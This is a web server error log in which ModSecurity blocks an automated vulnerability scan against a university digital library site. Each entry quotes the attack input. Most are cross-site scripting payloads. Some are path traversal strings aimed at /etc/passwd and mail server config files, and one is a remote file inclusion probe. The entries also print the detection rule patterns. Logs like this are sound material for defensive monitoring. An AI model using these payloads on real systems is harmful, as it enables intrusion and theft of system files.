[Tue Aug 29 11:52:22.165335 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoGFXIAAAAE"]
[Tue Aug 29 11:52:23.595156 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnjjNwAAAAX"]
[Tue Aug 29 11:52:24.841273 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoEZOQAAAAB"]
[Tue Aug 29 11:52:24.861456 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAn400sAAAAW"]
[Tue Aug 29 11:52:25.589589 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAnoOq8AAAAf"]
[Tue Aug 29 11:52:26.547289 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnjjOQAAAAX"]
[Tue Aug 29 11:52:26.590540 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAoPuTgAAAAM"]
[Tue Aug 29 11:52:26.594636 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnjjOUAAAAX"]
[Tue Aug 29 11:52:26.618751 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoPuTkAAAAM"]
[Tue Aug 29 11:52:27.897625 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAnd3GkAAAAI"]
[Tue Aug 29 11:52:27.951958 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15i8Co-f0AAAn401QAAAAW"]
[Tue Aug 29 11:52:28.720563 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoPuT4AAAAM"]
[Tue Aug 29 11:52:29.579804 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnjjPAAAAAX"]
[Tue Aug 29 11:52:30.547017 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoLfF0AAAAG"]
[Tue Aug 29 11:52:32.617348 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoN9dwAAAAJ"]
[Tue Aug 29 11:52:33.567557 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoN9d4AAAAJ"]
[Tue Aug 29 11:52:33.640714 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoPuVEAAAAM"]
[Tue Aug 29 11:52:34.556289 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAn402QAAAAW"]
[Tue Aug 29 11:52:34.632332 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoLfG8AAAAG"]
[Tue Aug 29 11:52:36.774820 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnTlRYAAAAA"]
[Tue Aug 29 11:52:37.539823 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoO50gAAAAK"]
[Tue Aug 29 11:52:37.621532 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoN9esAAAAJ"]
[Tue Aug 29 11:52:40.055200 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoGFaIAAAAE"]
[Tue Aug 29 11:52:40.536553 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAlUluQAAAA0"]
[Tue Aug 29 11:52:41.717203 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnHQmsAAAAT"]
[Tue Aug 29 11:52:42.556160 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnHQm8AAAAT"]
[Tue Aug 29 11:52:42.585484 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO52EAAAAK"]
[Tue Aug 29 11:52:45.021725 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnd3LQAAAAI"]
